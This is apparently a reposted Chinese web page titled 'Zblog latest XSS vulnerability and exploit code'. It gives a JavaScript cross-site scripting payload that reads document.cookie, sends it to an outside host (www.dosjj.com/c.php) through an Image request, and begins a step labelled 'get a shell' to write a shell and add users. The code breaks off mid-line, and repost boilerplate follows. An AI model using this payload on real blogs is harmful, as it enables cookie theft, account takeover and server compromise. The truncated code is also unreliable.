Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf(‘password’)==-1?0:1;
tolocation=’http://www.uoften.com/’;
//get cookie
x=new Image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txaContent=
最后
以上就是超级酸奶最近收集整理的关于Zblog最新跨站漏洞及利用代码的全部内容,更多相关Zblog最新跨站漏洞及利用代码内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复